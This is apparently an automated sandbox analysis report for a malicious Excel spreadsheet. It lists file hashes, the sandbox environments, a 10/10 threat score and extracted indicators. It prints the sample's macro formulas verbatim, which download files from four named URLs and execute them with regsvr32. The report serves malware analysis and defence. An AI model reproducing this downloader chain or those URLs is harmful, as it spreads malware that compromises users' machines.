General
-
Target
5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946
-
Size
92KB
-
Sample
230211-cs9tzadd2v
-
MD5
c8d86480cae889d55896e2642369a5f1
-
SHA1
5912e9a715533d5b9110daab4dbafe49236c8891
-
SHA256
5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946
-
SHA512
8b7182cdd30b1a95412bd847c30ff32e2493c5c445a0fcea12ce5801db7b3657a5230b328db66b44994c195862ffd7187acd972d771f8182e54b750563ef7714
-
SSDEEP
1536:/Vk3hOdsylKlgxopeiBNhZFGzE+cL2kdApbCXuZH4gb4CEn9J4ZKnQxW:tk3hOdsylKlgxopeiBNhZFGzE+cL2kdH
Behavioral task
behavioral1
Sample
5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946.xls
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946.xls
Resource
win10v2004-20220901-en
Malware Config
Extracted
http://www.muyehuayi.com/cmp/8asA99KPsyA/v6lUsWbLen/
http://concivilpa.com.py/wp-admin/i3CQu9dzDrMW/
https://wijsneusmedia.nl/cgi-bin/kFB/
http://www.angloextrema.com.br/assets/oEt1yYckHKlnNIq/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.muyehuayi.com/cmp/8asA99KPsyA/v6lUsWbLen/","..\elv1.ooocccxxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://concivilpa.com.py/wp-admin/i3CQu9dzDrMW/","..\elv2.ooocccxxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://wijsneusmedia.nl/cgi-bin/kFB/","..\elv3.ooocccxxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.angloextrema.com.br/assets/oEt1yYckHKlnNIq/","..\elv4.ooocccxxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx") =RETURN()
Extracted
http://www.muyehuayi.com/cmp/8asA99KPsyA/v6lUsWbLen/
http://concivilpa.com.py/wp-admin/i3CQu9dzDrMW/
https://wijsneusmedia.nl/cgi-bin/kFB/
http://www.angloextrema.com.br/assets/oEt1yYckHKlnNIq/
Targets
-
-
Target
5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946
-
Size
92KB
-
MD5
c8d86480cae889d55896e2642369a5f1
-
SHA1
5912e9a715533d5b9110daab4dbafe49236c8891
-
SHA256
5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946
-
SHA512
8b7182cdd30b1a95412bd847c30ff32e2493c5c445a0fcea12ce5801db7b3657a5230b328db66b44994c195862ffd7187acd972d771f8182e54b750563ef7714
-
SSDEEP
1536:/Vk3hOdsylKlgxopeiBNhZFGzE+cL2kdApbCXuZH4gb4CEn9J4ZKnQxW:tk3hOdsylKlgxopeiBNhZFGzE+cL2kdH
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-